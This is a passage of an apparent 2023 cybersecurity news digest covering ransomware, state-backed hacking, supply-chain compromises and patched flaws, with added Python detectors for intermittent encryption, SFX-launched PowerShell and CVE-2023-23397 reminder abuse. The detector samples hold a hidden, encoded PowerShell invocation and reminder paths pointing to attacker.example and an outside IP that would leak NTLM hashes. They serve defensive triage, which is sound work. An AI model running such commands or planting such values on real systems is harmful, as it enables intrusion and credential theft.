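HIGH_ENTROPY = 7.5    # bits/byte: ciphertext or compressed data
LOW_ENTROPY = 5.5     # bits/byte: text and most structured documents


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Entropy of each consecutive chunk, in file order."""
    return [shannon_entropy(data[i:i + chunk_size])
            for i in range(0, len(data), chunk_size)]


def classify(data: bytes) -> str:
    """'encrypted' if every chunk is high-entropy, 'plaintext' if none is,
    'intermittent' if high- and low-entropy chunks are both present."""
    ents = chunk_entropies(data)
    high = sum(e >= HIGH_ENTROPY for e in ents)
    low = sum(e <= LOW_ENTROPY for e in ents)
    if high and low:
        return "intermittent"
    if ents and high == len(ents):
        return "encrypted"
    return "plaintext"


def simulate_intermittent(data: bytes, chunk_size: int = CHUNK_SIZE, every: int = 2) -> bytes:
    """Overwrite every `every`-th chunk with a byte counter, which has a flat
    histogram and therefore the same Shannon entropy as ciphertext. This only
    builds a sample for the detector; it is NOT the Rorschach algorithm."""
    out = bytearray(data)
    for idx, start in enumerate(range(0, len(data), chunk_size)):
        if idx % every == 0:
            n = min(chunk_size, len(data) - start)
            out[start:start + n] = bytes((start + k) % 256 for k in range(n))
    return bytes(out)


# Constructed sample: a low-entropy "document" of 20,000 bytes (five chunks)
SAMPLE = b"Quarterly report: revenue grew 4% year over year. " * 400

if __name__ == "__main__":
    for name, blob in [("plain", SAMPLE),
                       ("full", bytes(range(256)) * 80),
                       ("partial", simulate_intermittent(SAMPLE))]:
        print(name, classify(blob), [round(e, 2) for e in chunk_entropies(blob)])
```

    Byte-histogram entropy is a coarse signal (compressed archives and media score high too), so in practice the "intermittent" verdict is most useful on file types that are normally low-entropy, such as documents and source trees, and combined with the mass-rename and high-write-rate signals a ransomware run produces.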

    HP to Patch Critical Bug in LaserJet Printers Within 90 Days

    In a security bulletin this week, HP announced that it would take up to 90 days to fix a critical vulnerability impacting several of its business-grade printers with IPsec enabled and running FutureSmart firmware version 5.6. Nearly 50 HP Enterprise LaserJet and HP LaserJet managed printer models are vulnerable to the flaw. According to HP, successful exploitation of CVE-2023-1707 could lead to information disclosure, allowing threat actors to access sensitive information transmitted between the vulnerable HP printers and other devices on the network.

    Fake Data Theft Proof Leads to Royal Ransomware Outbreak

    The Royal ransomware group - another offshoot of the disbanded Conti group - appears to have targeted over 1,000 organizations with a social engineering attack designed to trick victims into trusting the attackers. A security firm last month identified a spam campaign that appears to trace to Royal and that layers on the deception, first by falsely notifying victims that a ransomware group has attacked them and then by pressuring them into opening a file that purportedly lists what was stolen but is in fact a malware loader. Victims receive emails claiming that a "Midnight Group" was behind the original ransomware attack and that their data will be posted on the dark web if they do not pay. The Midnight Group's claims to have infected victims appeared fake, and the researchers assess, based on the attack telemetry, the malware used, and the emails received by victims, that Midnight is itself a fake persona likely cooked up by Royal.

    CISA Warns of Zimbra Bug Exploited in Attacks Against NATO Countries

    CISA is warning organizations to patch against an actively exploited vulnerability in Zimbra, a cloud-based collaboration suite. Tracked as CVE-2022-27926, the bug is a cross-site scripting flaw that can be exploited by unauthenticated actors to execute arbitrary web script or HTML via specially crafted requests. According to cybersecurity firm Proofpoint, CVE-2022-27926 was leveraged by a Russian hacking group, Winter Vivern or TA473, in attacks against several NATO-aligned governments' webmail portals to access the emails of officials, government and military personnel, and diplomats.

    Arid Viper Hacking Group Using Upgraded Malware in Middle East Cyber Attacks

    Researchers at Symantec recently disclosed details of a campaign that has been targeting Palestinian entities with a variety of malware toolkits since September 2022. The campaign has been attributed to Arid Viper (aka Mantis, APT-C-23, Desert Falcon), which is known for launching attacks against entities in Palestine and the Middle East dating back as early as 2014. Based on attacks observed by this group, Mantis relies on custom malware tools including ViperRat, FrozenCell (VolatileVenom), Arid Gopher, and Micropsia to target users of Windows, Android, and iOS platforms.

    WinRAR SFX Archives Can Run PowerShell Without Being Detected

    Cybercriminals are incorporating harmful features into self-extracting WinRAR archives, which contain benign files as a disguise, enabling them to implant backdoors undetected by security measures on target systems. Self-extracting archives are made with compression programs such as WinRAR or 7-Zip, and they function like executables that bundle archived data with a built-in decompression stub. These archives can be password-protected to restrict unauthorized access.
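    Because the SFX file is an ordinary executable (stub plus archive), file-level scanning of the archive is easy to defeat with a password; the more durable signal is the process tree, where the stub itself becomes the parent of the PowerShell or cmd.exe it launches. The following is an added example, not from the research this item summarizes, that applies that heuristic to Sysmon-style process-creation records. The field names (Image, ParentImage, CommandLine, CurrentDirectory), the launcher baseline and the sample events are constructed assumptions.

```python
"""Process-creation heuristic for SFX stubs that spawn PowerShell or cmd.exe.
Added example; field names, baseline lists and sample events are assumptions."""
import re
from pathlib import PureWindowsPath

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Parents that legitimately launch shells all day long (assumed baseline)
KNOWN_LAUNCHERS = {"explorer.exe", "cmd.exe", "powershell.exe", "code.exe",
                   "services.exe", "svchost.exe", "windowsterminal.exe"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\", "\\programdata\\")
EVASION_ARGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop(rofile)?\b|bypass)")


def looks_like_sfx_launch(event: dict) -> list:
    """Return the reasons an event is suspicious; an empty list means not flagged.
    Two independent signals are required to keep single-signal noise down."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"])
    parent_name = parent.name.lower()
    parent_str = str(parent).lower()
    if image not in SHELLS or parent_name in KNOWN_LAUNCHERS:
        return []
    reasons = []
    if any(seg in parent_str for seg in USER_WRITABLE):
        reasons.append(f"shell spawned by {parent_name} from a user-writable path")
    if EVASION_ARGS.search(event.get("CommandLine", "")):
        reasons.append("hidden/encoded/profile-less invocation")
    # An SFX stub extracts into a temp folder and runs its setup command from there
    cwd = event.get("CurrentDirectory", "").lower()
    if "\\temp\\" in cwd and parent_name.endswith(".exe"):
        reasons.append("working directory is a temp extraction folder")
    return reasons if len(reasons) >= 2 else []


def triage(events) -> list:
    """(ProcessId, reasons) for every flagged event, in input order."""
    hits = []
    for event in events:
        reasons = looks_like_sfx_launch(event)
        if reasons:
            hits.append((event["ProcessId"], reasons))
    return hits


# Constructed Sysmon-style EventID 1 records (not real telemetry)
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\alice\Downloads\invoice_2023.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgA",
     "CurrentDirectory": r"C:\Users\alice\AppData\Local\Temp\RarSFX0"},
    {"ProcessId": 5210,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe",
     "CurrentDirectory": r"C:\Users\alice"},
    {"ProcessId": 6001,
     "Image": r"C:\Program Files\7-Zip\7z.exe",
     "ParentImage": r"C:\Users\alice\Downloads\setup.exe",
     "CommandLine": "7z.exe x payload.7z",
     "CurrentDirectory": r"C:\Users\alice\Downloads"},
    {"ProcessId": 7330,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\RarSFX1\setup_helper.exe",
     "CommandLine": r"cmd.exe /c start /min powershell -WindowStyle Hidden -File run.ps1",
     "CurrentDirectory": r"C:\Users\bob\AppData\Local\Temp\RarSFX1"},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

    The two-signal requirement is a tuning choice: an installer legitimately running from Downloads will trip the first check alone, and the rule should be paired with the parent's signature status and file hash from the same event before it raises an alert.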

    IRS-authorized eFile[.]com Tax Return Software Caught Serving JS Malware

    eFile is a service provider authorized by the IRS to assist in submitting tax returns. Security researchers claim malicious JavaScript code has been pushed by the website for the last couple of weeks. The impacted website is eFile[.]com only, not the IRS’s e-file infrastructure. The malware in question is popper[.]js, which attempts to load JavaScript returned by infoamanewonliag[.]online. This malware comes at an impactful time as U.S. taxpayers are trying to wrap up their IRS tax returns before the April 18th deadline. The malicious JavaScript uses Math[.]random() which prevents caching and will load a fresh copy of the malware every time eFile is visited. BleepingComputer confirmed that the malicious JavaScript file was being loaded on almost every page of eFile up until at least April 1st.

    Fake Ransomware Gang Targets U.S. Orgs With Empty Data Leak Threats

    Fake extortionists are attempting to take advantage of data breaches and ransomware incidents to threaten US companies, demanding payment in exchange for not publishing or selling data they claim to have stolen. Additionally, the threat actors may threaten to launch DDoS attacks if their demands are not met. Since March 16, the group dubbed Midnight has used email impersonation to pass itself off as established ransomware and data extortion groups. In some instances, they claimed responsibility for an attack and stated that they had stolen significant amounts of data.

    New Money Message Ransomware Demands Million Dollar Ransoms

    A new ransomware gang named 'Money Message' has appeared, targeting victims worldwide and demanding million-dollar ransoms not to leak data and release a decryptor. The new ransomware was first reported by a victim on the BleepingComputer forums on March 28, 2023, with Zscaler's ThreatLabz soon after sharing information on Twitter. Currently, the threat actor lists two victims on its extortion site, one of which is an Asian airline with annual revenue close to $1 billion.

    Hackers Exploit Bug in Elementor Pro WordPress Plugin With 11M Installs

    Last week, NinTechNet security researcher Jerome Bruandet shared a technical write-up regarding an actively exploited high-severity vulnerability in Elementor Pro, a WordPress builder plugin that allows users without any coding experience to easily build professional-looking sites. According to Bruandet, the vulnerability stems from improper validation and access control in the plugin's WooCommerce module and can be abused to modify WordPress options in the database without authentication.

    North Korean Lazarus Group Linked to 3CX Supply Chain Hack

    Security researchers have uncovered more evidence that the North Korean Lazarus group is responsible for the software supply chain attack on 3CX, a voice and video calling desktop client used by major multinational companies. Attribution to the Lazarus group became evident during an analysis of the tools used in the attack, cybersecurity firms Volexity, Sophos, CrowdStrike and others said. "The shellcode sequence appears to have been only used in the ICONIC loader and the APPLEJEUS malware, which is known to be linked to Lazarus," Volexity said. "The code in this incident is a byte-to-byte match to those previous samples," Sophos said. Researchers at CrowdStrike also analyzed and reverse-engineered the code and identified the threat actor as Labyrinth Chollima, another name for the Lazarus cyberespionage group. "Once active, the HTTPS beacon structure and encryption key match those observed by CrowdStrike in a March 7, 2023, campaign attributed with high confidence to DPRK-nexus threat actor LABYRINTH CHOLLIMA."

    Western Digital Discloses Network Breach, My Cloud Service Down

    Western Digital announced today that its network has been breached and an unauthorized party gained access to multiple company systems. The California-based computer drive maker and provider of data storage services says in a press release that the network security incident was identified last Sunday, on March 26. An investigation is in its early stages and the company is coordinating efforts with law enforcement authorities.

    Bing Search Results Hijacked via Misconfigured Microsoft App

    Threat actors have hijacked Bing search results by exploiting a misconfigured Microsoft app. The vulnerability allowed the attackers to manipulate search results and redirect users to malicious websites, putting them at risk of phishing attacks and malware downloads. Wiz researchers discovered the vulnerability, dubbed BingBang, and informed Microsoft on January 31, 2023.

    Microsoft OneNote Will Block 120 Dangerous File Extensions

    On March 10, Microsoft announced that it would be bringing forth enhanced security measures to protect against known phishing file types including OneNote files, which have become a popular distribution method ever since the company blocked Word and Excel macros by default and patched a MoTW bypass zero-day exploited to drop malware via ISO and ZIP files. Yesterday, the tech giant published an update, providing more details regarding what specific file extensions will be blocked when the improvements are rolled out. In total, Microsoft will be blocking 120 extensions deemed dangerous.

    CISA Orders Agencies to Patch Bugs Exploited to Drop Spyware

    Yesterday, CISA added several security vulnerabilities to its catalog of known exploited vulnerabilities. According to a new blog post by Google's Threat Analysis Group, the flaws were leveraged as part of several exploit chains in two separate campaigns, ultimately leading to the installation of spyware on targeted devices. The first of the campaigns was spotted in November 2022, with actors using the exploit chains to compromise iOS and Android devices. The second campaign took place one month later, abusing several zero-day and n-day exploits to target Samsung Android phones running up-to-date versions of the Samsung Internet Browser.

    Leaks Reveal Moscow Source for Hacking, Disinformation Tools

    The files, leaked from the Moscow-based contractor Vulkan and dating from 2016 to 2021, include emails, internal documents, project plans, budgets, and contracts. One of Vulkan's clients is the hacking group Sandworm. A project dubbed Amezit (or Amesit) is designed to help the Russian military automate large-scale disinformation operations across social media and other channels such as email and SMS texts, using fake accounts populated by avatars that sport stolen photographs and extensive backstories. Another, called Krystal-2B, includes tools for training hacking teams to attack railways, pipelines, and other operational technology environments.

    TLP:GREEN - Hackers Compromise 3CX Desktop App in a Supply Chain Attack

    An ongoing supply chain attack is reportedly using a trojanized version of the 3CX VOIP desktop client, which is digitally signed, to target the company's customers. 3CX is a software development company that provides VOIP IPBX services. Its 3CX Phone System is popular among businesses, with over 12 million daily users and 600,000+ companies worldwide using the software. Attackers are targeting both Windows and macOS users.

    New AlienFox Toolkit Steals Credentials for 18 Cloud Services

    Researchers at SentinelOne have uncovered a new modular toolkit dubbed AlienFox which enables actors to scan misconfigured servers and steal authentication secrets and credentials for cloud-based email services. The toolkit is currently being sold to cybercriminals via a private Telegram channel and is capable of targeting online hosting frameworks including Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress hosted on misconfigured servers for secrets. According to researchers, they identified three different versions of AlienFox, indicating that the authors behind the toolkit are actively developing and improving the tool.

    QNAP Warns Customers to Patch Linux Sudo Flaw in NAS Devices

    QNAP recently published security updates to address a high-severity Sudo privilege escalation vulnerability in its Linux-powered network-attached storage devices. Tracked as CVE-2023-22809, the flaw was discovered by Synacktiv security researchers, who describe it as a "sudoers policy bypass in Sudo version 1.9.12p1 when using sudoedit." Successful exploitation could enable attackers to escalate privileges on impacted devices by editing unauthorized files after appending arbitrary entries to the list of files to process.

    FDA Protects Medical Devices Against Cyber-Threats With New Measures

    The US Food and Drug Administration (FDA) has published new guidelines to strengthen the cybersecurity of internet-connected products used by hospitals and healthcare providers. According to a guidance document published earlier today, applicants seeking approval for new medical devices must submit a plan designed to "monitor, identify and address" possible cybersecurity issues associated with them.

    3CX Desktop Application Supply Chain Attack - Worldwide

    On Mar. 29, open sources reported that a trojanized version of the 3CX Voice Over Internet Protocol (VOIP) desktop client application is being used to target the company's customers in an ongoing supply chain attack. 3CX's VOIP software is used by more than 600,000 companies worldwide with over 12 million users.

    Phishing Campaign Tied to Russia-Aligned Cyberespionage

    Recent targets of the Russia-aligned group have included U.S. elected officials and staffers, multiple European governments - including Ukrainian and Italian foreign ministry officials - plus Indian government officials and private telecommunications firms that support Ukraine, researchers at security firms Proofpoint and SentinelOne report. The hackers exploit hosted Zimbra portals as part of island-hopping attacks, moving through a chain of victims to eventually reach their desired target, which might be government systems or energy systems they would try to disrupt.

    Google Finds More Android, iOS Zero-Days Used to Install Spyware

    Google's Threat Analysis Group (TAG) discovered several exploit chains using Android, iOS, and Chrome zero-day and n-day vulnerabilities to install commercial spyware and malicious apps on targets' devices. The attackers targeted iOS and Android users with separate exploit chains as part of a first campaign spotted in November 2022. They used text messages pushing bit.ly shortened links to redirect the victims to legitimate shipment websites from Italy, Malaysia, and Kazakhstan after first sending them to pages triggering exploits abusing a WebKit remote code execution zero-day (CVE-2022-42856) and a sandbox escape (CVE-2021-30900) bug. On compromised devices, the threat actors dropped a payload allowing them to track the victims' location and install .IPA files. In this campaign, an Android exploit chain was also used to attack devices featuring ARM GPUs with a Chrome GPU sandbox bypass zero-day (CVE-2022-4135), an ARM privilege escalation bug (CVE-2022-38181), and a Chrome type confusion bug (CVE-2022-3723) with an unknown payload.

    Newly Exposed APT43 Hacking Group Targeting US Orgs Since 2018

    A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years. The moderately-sophisticated threat actor is tracked as 'APT43' and is seen engaging in espionage and financially-motivated cybercrime operations that help fund its activities. Mandiant analysts who disclosed the activities of APT43 for the first time assess with high confidence that the threat actors are state-sponsored, aligning their operational goals with the North Korean government's geopolitical aims. The researchers have been tracking APT43 since late 2018 but have disclosed more specific details about the threat group only now.

    Crown Resorts Confirms Ransom Demand After GoAnywhere Breach

    Crown Resorts, which operates hotels and casinos in Australia, confirmed a data breach. The resort operator has annual revenue surpassing 8 billion and operates in Melbourne, Perth, Sydney, Macau, and London. The attackers abused a flaw in the GoAnywhere file transfer software to access sensitive data, including financial and personal information. They subsequently demanded a ransom payment to prevent them from disclosing the stolen data.

    Telecom Giant Lumen Suffered a Ransomware Attack and Disclosed a Second Incident

    In a filing to the Securities and Exchange Commission on March 27, 2023, Lumen announced two cybersecurity incidents. One of them is a ransomware attack that impacted a limited number of its servers supporting a segmented hosting service. The company did not identify the ransomware family that infected its systems; it only admitted that the incident “is currently degrading the operations of a small number of the Company’s enterprise customers.”

    Microsoft Shares Guidance for Investigating Attacks Exploiting CVE-2023-23397

    This week, Microsoft published investigation guidance to help Outlook customers search for attacks exploiting a recently patched vulnerability tracked as CVE-2023-23397. Using the flaw, a remote attacker can obtain a user’s Net-NTLMv2 hash by sending a specially crafted email to an affected system; the hash can then be relayed or cracked to authenticate as the victim. The leak is triggered when Outlook processes the message's reminder, so no user interaction is required beyond the client receiving the email.
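    The property Microsoft's guidance has administrators look for is PidLidReminderFileParameter: when it holds a UNC path, Outlook connects to that host to fetch a custom reminder sound and authenticates with NTLM as the user. The triage routine below is added here as an illustration, not Microsoft's script; it scans exported message properties for that pattern. The message dictionaries, the trusted-host set, and the sample items are constructed for the example.

```python
import re
from typing import Dict, Iterable, List, Optional

# Extended MAPI property that CVE-2023-23397 abuses. When it holds a UNC path,
# Outlook reaches for the "custom reminder sound" on that host as soon as the
# reminder fires, sending the user's Net-NTLMv2 response to whoever answers.
REMINDER_PROP = "PidLidReminderFileParameter"

# Hosts that may legitimately serve reminder sounds in this environment.
# This set is an assumption for the example; fill it from your own inventory.
TRUSTED_HOSTS = {"fileserver.corp.example"}

# UNC forms: \\host\share\file.wav and the WebDAV variants \\host@80\... / \\host@SSL\...
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(?:SSL|\d+))?\\", re.IGNORECASE)


def reminder_target_host(props: Dict[str, str]) -> Optional[str]:
    """Return the remote host a reminder property points at, or None if it is empty or local."""
    value = props.get(REMINDER_PROP)
    if not value:
        return None
    match = UNC_RE.match(value.strip())
    return match.group(1).lower() if match else None


def scan_messages(messages: Iterable[Dict]) -> List[Dict[str, str]]:
    """Flag messages whose reminder property would make Outlook authenticate off-box."""
    hits = []
    for msg in messages:
        host = reminder_target_host(msg.get("props", {}))
        if host and host not in TRUSTED_HOSTS:
            hits.append({"subject": msg.get("subject", ""),
                         "sender": msg.get("sender", ""),
                         "target_host": host})
    return hits


# Constructed sample: four message items as an EWS/MAPI export might present them.
SAMPLE_MESSAGES = [
    {"subject": "Team sync", "sender": "alice@corp.example", "props": {}},
    {"subject": "Standup", "sender": "bob@corp.example",
     "props": {REMINDER_PROP: r"\\fileserver.corp.example\sounds\chime.wav"}},
    {"subject": "Invoice overdue", "sender": "billing@invoices-example.net",
     "props": {REMINDER_PROP: r"\\203.0.113.5\pub\reminder.wav"}},
    {"subject": "Calendar update", "sender": "hr@corp-example.org",
     "props": {REMINDER_PROP: r"\\attacker.example@80\dav\alert.wav"}},
]

if __name__ == "__main__":
    for hit in scan_messages(SAMPLE_MESSAGES):
        print(f"{hit['subject']!r} from {hit['sender']} -> {hit['target_host']}")
```

    A hit is only the starting point: the sending account, the target host, and any outbound SMB or WebDAV connection from the mailbox owner's workstation around the reminder time are what the incident record needs.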

    WiFi Protocol Flaw Allows Attackers to Hijack Network Traffic

    Cybersecurity researchers have discovered a fundamental security flaw in the design of the IEEE 802.11 WiFi protocol standard, “allowing attackers to trick access points into leaking network frames in plaintext form” (Bleeping Computer, 2023). WiFi frames are data containers consisting of a header, a data payload, and a trailer; the header carries the source and destination MAC addresses along with control and management information.

    Nigerian Sentenced to 4 Years for Scamming US Citizens

    A U.S. federal judge sentenced a Nigerian national to four years in prison for running several cyber-enabled schemes aimed at defrauding U.S. citizens out of more than $1 million. The men were arrested four years ago and extradited to Arizona in 2022 from Malaysia and the United Kingdom. Solomon Ekunke Okpe, 31, of Lagos and his co-conspirator, Johnson Uke Obogo, orchestrated business email compromise phishing attacks and a variety of schemes including work-from-home offers, check cashing, romance and credit card scams that targeted individuals, banks and other businesses, the U.S. Department of Justice said Monday.

    Latitude Financial Data Breach Now Impacts 14 Million Customers

    Australian loan giant Latitude Financial Services (Latitude) is warning customers that its data breach has worsened. It has released an updated data breach notification warning that the number of people impacted has increased from 328,000 to 14 million. "As our forensic review continues to progress, we have identified that approximately 7.9 million Australian and New Zealand driver's license numbers were stolen, of which approximately 3.2 million, or 40%, were provided to us in the last ten years. Approximately 6.1 million records dating back to 2005 were also stolen, of which approximately 5.7 million, or 94%, were provided before 2013."

    New IcedID Variants Shift From Bank Fraud to Malware Delivery

    Researchers at Proofpoint reported the discovery of new variants of the IcedID malware that lack the usual functionality for online banking fraud. Instead, the malware installs further malware on compromised systems, with a particular emphasis on ransomware. According to Proofpoint, two new variants of the IcedID loader, called Lite and Forked, were identified: Lite was first observed in November 2022, while Forked was seen in February 2023. Both variants deliver the IcedID bot but with a more limited set of features. By removing unnecessary functions from the IcedID malware used in various campaigns, the threat actors make it more streamlined and harder to detect, which could help them evade security software.

    New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords

    Security researchers at Uptycs recently uncovered a new information-stealing malware targeting macOS systems, primarily those running macOS Catalina and later on M1 and M2 chips. Dubbed MacStealer, the malware can steal documents, browser cookies, login information, and much more. It is distributed as malware-as-a-service (MaaS), with the developer currently selling premade builds for $100. According to the developer, MacStealer is still in an early development phase and offers no panels or builders; however, the developer plans to update the malware with more features, including the ability to capture data from Apple’s Safari browser and the Notes application.

    Apple Fixes Recently Disclosed WebKit Zero-Day on Older iPhones

    Apple recently published security updates that backport to older devices the fix for an actively exploited zero-day bug disclosed earlier in February 2023. Tracked as CVE-2023-23529, the zero-day is a WebKit type confusion bug that could enable attackers to trigger OS crashes and gain code execution on vulnerable iOS and iPadOS devices after tricking victims into opening malicious web pages.

    OPENAI: A Redis Bug Caused a Recent ChatGPT Data Exposure Incident

    OpenAI revealed that a bug in the open-source Redis client library it uses (redis-py) caused the recent exposure of other users' chat titles and some subscribers' personal information in the ChatGPT service. When a request was cancelled after it had been queued but before Redis had responded, the connection could be returned to the pool with the stale response still pending, so the next request on that connection received data cached for a different user. On March 20, 2023, several ChatGPT users started reporting seeing conversation histories of other users appearing in their accounts. The same day, the history function showed the error message “Unable to load history,” and the chatbot service was temporarily interrupted.

    New Dark Power Ransomware Claims 10 Victims in Its First Month

    A new ransomware operation named 'Dark Power' has appeared, and it has already listed its first victims on a dark web data leak site, threatening to publish the data if a ransom is not paid. The ransomware gang's encryptor has a compilation date of January 29, 2023, when the attacks started. Furthermore, the operation has not been promoted on any hacker forums or dark web spaces yet; hence it's likely a private project. According to Trellix, which analyzed Dark Power, this is an opportunistic ransomware operation that targets organizations worldwide, asking for relatively small ransom payments of $10,000.

    3-Year JS Injection Campaign Targets 51,000 Websites

    A widespread ongoing malicious JavaScript injection campaign first detected in 2020 has targeted over 51,000 websites, redirecting victims to malicious content such as adware and scam pages. Unit 42 researchers have been tracking this activity through 2022 and it continues to infect websites in 2023. They suspect the campaign "has impacted a large number of people, since hundreds of these infected websites were ranked in Tranco's top million websites." Victims are typically redirected to an adware or a scam page, mostly masquerading as a well-known video-sharing platform or deceptive content that tricks victims into allowing an attacker-controlled website to send browser notifications.

    IRS Phishing Emails Used to Distribute Emotet

    The US Internal Revenue Service issued a warning to taxpayers about a new phishing campaign that employs Emotet malware to steal personal information. The emails, which appear to come from the IRS, include a malicious attachment or link that, if clicked, downloads the Emotet malware onto the victim's machine.

    GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations

    Cloud-based repository hosting service GitHub said it took the step of replacing its RSA SSH host key used to secure Git operations "out of an abundance of caution" after it was briefly exposed in a public repository. The activity, which was carried out at 05:00 UTC on March 24, 2023, is said to have been undertaken as a measure to prevent any bad actor from impersonating the service or eavesdropping on users' operations over SSH.
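    Clients that had the old key pinned see a host-key-changed warning on their next connection; the right response is to remove the stale github.com entry and pin the new key only after checking its fingerprint against the one GitHub publishes on its SSH key fingerprints page. The snippet below is added here and is not GitHub's own tooling: it computes the same SHA256 fingerprint that `ssh-keygen -lf` prints and refuses to rewrite known_hosts when the fingerprint does not match. The host keys in it are constructed stand-ins, not GitHub's real keys.

```python
import base64
import hashlib
import struct


def ssh_fingerprint(key_line: str) -> str:
    """SHA256 fingerprint as `ssh-keygen -lf` prints it: unpadded base64 of SHA-256 over the key blob."""
    key_type, blob_b64 = key_line.split()[:2]
    blob = base64.b64decode(blob_b64)
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def fingerprint_matches(key_line: str, expected: str) -> bool:
    return ssh_fingerprint(key_line) == expected


def rotate_host_key(known_hosts: str, host: str, new_key_line: str, expected_fp: str) -> str:
    """Replace `host`'s key of the new key's type, but only if the new key has the fingerprint we expect."""
    if not fingerprint_matches(new_key_line, expected_fp):
        raise ValueError(f"refusing to pin {host}: got {ssh_fingerprint(new_key_line)}, expected {expected_fp}")
    key_type = new_key_line.split()[0]
    kept = []
    for line in known_hosts.splitlines():
        fields = line.split()
        # Plain (unhashed) entries look like: "host[,host2] key-type base64 [comment]"
        if len(fields) >= 3 and fields[1] == key_type and host in fields[0].split(","):
            continue  # drop the old key of this type for this host
        kept.append(line)
    kept.append(f"{host} {new_key_line.strip()}")
    return "\n".join(kept) + "\n"


# --- constructed sample keys (not real GitHub keys): minimal ssh-rsa / ssh-ed25519 blobs ---
def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _fake_rsa_key(modulus: bytes) -> str:
    blob = _ssh_string(b"ssh-rsa") + _ssh_string(b"\x01\x00\x01") + _ssh_string(modulus)
    return "ssh-rsa " + base64.b64encode(blob).decode()


def _fake_ed25519_key(point: bytes) -> str:
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(point)
    return "ssh-ed25519 " + base64.b64encode(blob).decode()


OLD_KEY = _fake_rsa_key(b"\x00\xc0" + b"\x11" * 30)
NEW_KEY = _fake_rsa_key(b"\x00\xd4" + b"\x22" * 30)
ED25519_KEY = _fake_ed25519_key(b"\x33" * 32)
OLD_KNOWN_HOSTS = (
    f"github.com {OLD_KEY}\n"
    f"github.com {ED25519_KEY}\n"
    f"gitlab.example {OLD_KEY}\n"
)

if __name__ == "__main__":
    expected = ssh_fingerprint(NEW_KEY)  # in real use: the value from GitHub's fingerprints page
    print(rotate_host_key(OLD_KNOWN_HOSTS, "github.com", NEW_KEY, expected))
```

    Two caveats: the expected fingerprint must come from GitHub's published list, never from the ssh prompt that is asking you to trust the key; and files written with HashKnownHosts contain hashed host names this matcher cannot see, so there the equivalent is `ssh-keygen -R github.com` followed by re-adding the verified key.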

    WordPress Force Patching WooCommerce Plugin With 500K Installs

    WordPress has force-installed security updates on hundreds of thousands of websites running WooCommerce Payments, a popular payment plugin for online stores. The security update addresses a critical flaw (CVSS 9.8) that allows unauthenticated attackers to gain admin access to vulnerable stores.

    US Officials Urged to Examine Chinese Risk to Electric Grid

    Utility companies increasingly refrain from purchasing large power transformers from China given greater awareness of the security risks, a U.S. Department of Energy official told a Senate panel. Puesh Kumar said Thursday the U.S. government is analyzing the prevalence of Chinese-made components in the electric grid but wouldn't indicate when he expects the work to be done, frustrating senators on both sides of the aisle. The head of the department's Office of Cybersecurity, Energy Security, and Emergency Response testified before the Senate Energy and Natural Resources Committee.

    Exploit Released for Veeam Bug Allowing Cleartext Credential Theft

    Cross-platform exploit code is now available for a high-severity Backup Service vulnerability impacting Veeam's Backup & Replication (VBR) software. The flaw (CVE-2023-27532) affects VBR versions prior to the fixed builds released in March 2023 and can be exploited by unauthenticated attackers to breach backup infrastructure after stealing cleartext credentials and gaining remote code execution as SYSTEM. Horizon3's Attack Team published a technical root cause analysis of the vulnerability, which includes a detailed proof-of-concept (PoC).

    Operation Soft Cell: Chinese Hackers Breach Middle East Telecom Providers

    Researchers at SentinelOne and QGroup have uncovered a new campaign targeting telecommunication providers in the Middle East since the first quarter of 2023. The attacks have been attributed to a Chinese cyber espionage actor that researchers associate with a long-running campaign dubbed “Operation Soft Cell,” which has been under the radar since 2012. Given the toolset deployed, it is likely that this cyberespionage actor is the nexus of Gallium and APT41, which have a history of targeting telecommunication entities across the globe.

    German and South Korean Agencies Warn of Kimsuky's Expanding Cyber Attack Tactics

    German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service (NIS). The intrusions are designed to strike ‘experts on the Korean Peninsula and North Korea issues’ through spear-phishing campaigns, the agencies noted.

    Dole Discloses Employee Data Breach after Ransomware Attack

    Fresh produce giant Dole Food Company has confirmed threat actors behind a February ransomware attack have accessed the information of an undisclosed number of employees. Dole employs around 38,000 people worldwide, providing fresh fruits and vegetables to customers in more than 75 countries. The company revealed that last month's cyberattack directly impacted its employees' information in the annual report filed with the U.S. Securities and Exchange Commission (SEC) on Wednesday.

    US FTC Seeks Information on Cloud Provider Cybersecurity

    The global shift into cloud computing may come under increased scrutiny by U.S. regulators following an announcement by the U.S. Federal Trade Commission that it is studying cloud industry market dynamics, including potential security risks. The oversight agency issued a request for information asking whether cloud providers use contractual or technological measures to entrench customers. It also asks for public response by May 22 to questions such as what representations cloud providers make about data security and contractual divisions of responsibility for the security of consumer personal information stored in the cloud.

    Over 2400 Fake Pages Found Targeting Job Seekers in Middle East, Africa

